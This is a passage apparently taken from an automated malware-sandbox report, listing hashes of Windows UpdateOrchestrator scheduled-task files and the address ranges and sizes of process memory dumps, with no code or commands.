                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                          Filesize

                                                                                                                          3KB

                                                                                                                          MD5

                                                                                                                          c6086d02f8ce044f5fa07a98303dc7eb

                                                                                                                          SHA1

                                                                                                                          6116247e9d098b276b476c9f4c434f55d469129c

                                                                                                                          SHA256

                                                                                                                          8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0

                                                                                                                          SHA512

                                                                                                                          1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                          Filesize

                                                                                                                          3KB

                                                                                                                          MD5

                                                                                                                          39b9eb9d1a56bc1792c844c425bd1dec

                                                                                                                          SHA1

                                                                                                                          db5a91082fa14eeb6550cbc994d34ebd95341df9

                                                                                                                          SHA256

                                                                                                                          acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

                                                                                                                          SHA512

                                                                                                                          255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          4ac1741ceb19f5a983079b2c5f344f5d

                                                                                                                          SHA1

                                                                                                                          f1ebd93fbade2e035cd59e970787b8042cdd0f3b

                                                                                                                          SHA256

                                                                                                                          7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

                                                                                                                          SHA512

                                                                                                                          583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          a9124c4c97cba8a07a8204fac1696c8e

                                                                                                                          SHA1

                                                                                                                          1f27d80280e03762c7b16781608786f5a98ff434

                                                                                                                          SHA256

                                                                                                                          8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

                                                                                                                          SHA512

                                                                                                                          537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

                                                                                                                        • memory/324-105-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/324-113-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/324-107-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/324-108-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/324-111-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/324-110-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/324-106-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/324-112-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          756KB

                                                                                                                        • memory/400-164-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/400-163-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/400-158-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/408-154-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/408-150-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/408-153-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/628-116-0x0000025298050000-0x0000025298075000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/628-117-0x0000025298080000-0x00000252980AA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/628-118-0x0000025298080000-0x00000252980AA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/628-123-0x0000025298080000-0x00000252980AA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/628-124-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/676-134-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/676-133-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/676-128-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/964-144-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/964-143-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/964-138-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/1300-103-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/1300-104-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          756KB

                                                                                                                        • memory/1300-102-0x00000147D7250000-0x00000147D727A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/2064-14-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2064-19-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2064-16-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2064-15-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2064-20-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2064-13-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2064-12-0x0000011548060000-0x0000011548082000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/2568-101-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2568-0-0x00007FF891683000-0x00007FF891685000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/2568-2-0x00007FF891680000-0x00007FF892142000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2568-1-0x0000000000D90000-0x0000000000DF2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          392KB

                                                                                                                        • memory/3280-100-0x00000000004C0000-0x00000000004E2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/3788-70-0x0000000000850000-0x0000000000872000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB